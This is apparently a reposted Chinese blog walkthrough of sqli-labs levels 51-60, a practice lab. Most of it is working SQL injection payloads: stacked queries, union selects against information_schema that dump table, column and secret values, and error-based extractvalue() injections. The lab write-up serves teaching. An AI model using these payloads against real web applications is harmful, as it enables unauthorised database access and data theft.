sql-lib闯关秘籍之51-60关
Posted 泷十三
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sql-lib闯关秘籍之51-60关相关的知识,希望对你有一定的参考价值。
下面开始11-20关,之前不会的关卡可以参考我这几篇文章: sql-lib闯关秘籍之1-10关,sql-lib闯关秘籍之11-20关,sql-lib闯关秘籍之21-30关, sql-lib闯关秘籍之31-40关 ,sql-lib闯关秘籍之41-50关
不管是第几关,我们的最终目标是获得用户密码,从而获取最高权限!
以下的学习过程中如果遇到那里不会的或者不清楚的地方,欢迎大家留言,我将尽力帮助大家~
第五十一关
这一关和三十八关基本一样 ,堆叠注入问题 只不过是字符型 ?sort=1\';create table test51 like users;%23
看数据库发现有啦
第五十二关
和五十关一样,只不过不显示错误
?sort=1;create table test52 like users;%23
堆叠注入
第五十三关
和五十一关一样,区别是不显示错误
?sort=1\';create table test53 like users;%23
第五十四关
这一关没什么特别 特别在于查询的次数 ,只能输入10次注入信息,记录方式是cookie。
查库 ?id=-1%27%20union%20select%201,database(),%273
查表 ?id=-1\' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23
爆列 ?id=-1\' union select 1,group_concat(column_name),3 from information_schema.columns where table_name=\'i58u96bgqr(后面这关name是咱们刚才查到的)
爆数据 ?id=-1\' union select 1,group_concat(secret_6KHN),3 from i58u96bgqr%23(爆咱刚才查到的一张表的数据)
将我们刚才获得的输入得到这个
第五十五关
和上一关一样,加了一个小括号 通过测试发现是加了小括号,一共可以输入14次
查表 ?id=-1) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23(和上一关一样就是把引号改成括号了,是吧)
第五十六关
和之前一样,通过测试发现是单引号括号闭合,其他的操作一样,我就不截图了
看数据库名 ?id=-1\') union select 1,database(),3%23
第五十七关
经过测试,发现是双引号闭合,其他和前几关一样
查询数据库名 ?id=-1" union select 1,database(),3%23(基本一样不再截图)
第五十八关
我发现这机关的颜色搭配挺好看哈,这关好像只有5次机会啊。。。
后来发现没有回显,一查,这一关不能用union select语句了,那我们报错试一下
报错输入获得数据库名 ?id=0\' and extractvalue(1, concat(0x5c, (select database())))%23
那就说明报错说明可以的,报错注入在之前的文章有介绍,不在这里在做解释
第五十九关
和上一关一样只不过没有单引号
报错输入获得数据库名 ?id=0 and extractvalue(1, concat(0x5c, (select database())))%23
第六十关
和上一关一样,只不过多了双引号和括号?id=0”)
报错输入获得数据库名 ?id=0") and extractvalue(1, concat(0x5c, (select database())))%23
获取表名 ?id=0") union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=\'challenges\'),0x7e))--+
爆列名 ?id=-1") union select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=\'wapsbffje5\'),0x7e))--+
爆数据 ?id=-1") union select extractvalue(1,concat(0x7e,(select group_concat(secret_XSR5) from wapsbffje5),0x7e))--+
输入进去 RsPZ518K3ZvXCVOvrGbhuqAZ 你搞定了他
哈哈哈哈哈,结束了60关了
51-60关结束
该文章有参考了以下的网页:
以上是关于sql-lib闯关秘籍之51-60关的主要内容,如果未能解决你的问题,请参考以下文章